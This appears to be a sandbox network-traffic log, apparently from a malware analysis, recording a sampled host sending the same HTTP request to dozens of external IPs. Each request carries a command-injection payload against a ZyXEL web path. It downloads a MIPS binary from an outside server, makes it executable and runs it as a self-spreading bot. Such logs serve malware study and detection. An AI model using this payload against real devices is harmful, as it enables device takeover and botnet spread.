                                                Jan 12, 2024 18:24:21.501611948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                896192.168.2.1344620139.108.101.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501677990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                897192.168.2.1355108191.48.199.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501744032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                898192.168.2.1353006115.136.219.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501786947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                899192.168.2.1341318194.61.213.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501843929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                900192.168.2.1335938148.102.7.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501905918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                901192.168.2.1350454164.74.53.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.501955986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                902192.168.2.1360776123.96.187.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502019882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                903192.168.2.134413897.21.101.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502039909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                904192.168.2.134438824.104.102.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502094030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                905192.168.2.13393669.31.237.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502151012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                906192.168.2.1355278169.180.189.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502223969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                907192.168.2.1343600113.212.207.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502260923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                908192.168.2.1339768155.156.209.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502331972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                909192.168.2.1333082213.169.154.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502386093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                910192.168.2.1334100152.126.229.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.502444029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                911192.168.2.134485681.37.224.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.513907909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                912192.168.2.1359750185.241.190.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.513982058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                913192.168.2.13370062.236.70.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514039993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                914192.168.2.133821838.111.136.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514141083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                915192.168.2.1347220175.65.149.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514168978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                916192.168.2.1336908126.252.126.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514190912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                917192.168.2.133416859.37.96.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514221907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                918192.168.2.133954046.16.90.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514282942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                919192.168.2.1349068153.99.138.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514322996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                920192.168.2.1351396174.254.52.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514385939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                921192.168.2.135525285.121.194.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514421940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                922192.168.2.134510012.255.106.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514475107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                923192.168.2.1340894138.18.23.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514516115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                924192.168.2.1357356134.58.35.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514558077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                925192.168.2.1340834130.233.41.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514585018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                926192.168.2.1339930176.105.51.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514619112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                927192.168.2.1347036104.237.113.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514695883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                928192.168.2.134380094.107.6.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514698982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                929192.168.2.135117053.114.200.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514749050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                930192.168.2.134208813.34.14.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514770031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                931192.168.2.1358296126.214.125.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514792919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                932192.168.2.1342784151.218.228.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514832020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                933192.168.2.1346648178.38.58.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514885902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                934192.168.2.1352886118.182.125.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514939070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                935192.168.2.1359376152.147.123.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.514975071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                936192.168.2.1351536150.41.188.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515008926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                937192.168.2.134826673.160.25.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515041113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                938192.168.2.1347162190.201.220.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515084982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                939192.168.2.134155065.155.216.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515125036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                940192.168.2.1356152111.33.224.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515156031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                941192.168.2.1356130161.13.158.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515201092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                942192.168.2.135819483.100.107.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515245914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                943192.168.2.133574838.67.189.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515275002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                944192.168.2.135392414.27.152.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515319109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                945192.168.2.134505038.220.195.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515342951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                946192.168.2.1343070189.234.28.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515407085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                947192.168.2.134917613.254.197.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515445948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                948192.168.2.1338626181.87.225.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515481949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                949192.168.2.1338110140.87.147.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515516996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                950192.168.2.135749896.96.253.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515556097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                951192.168.2.1360950172.59.81.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515579939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                952192.168.2.134583697.52.109.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515626907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                953192.168.2.134641267.63.15.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515649080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                954192.168.2.1339636176.1.255.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515705109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                955192.168.2.1337410199.196.54.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515743971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                956192.168.2.1359442194.15.197.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515774012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                957192.168.2.135326270.186.64.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.515834093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                958192.168.2.133379451.236.93.223443
                                                TimestampBytes transferredDirectionData
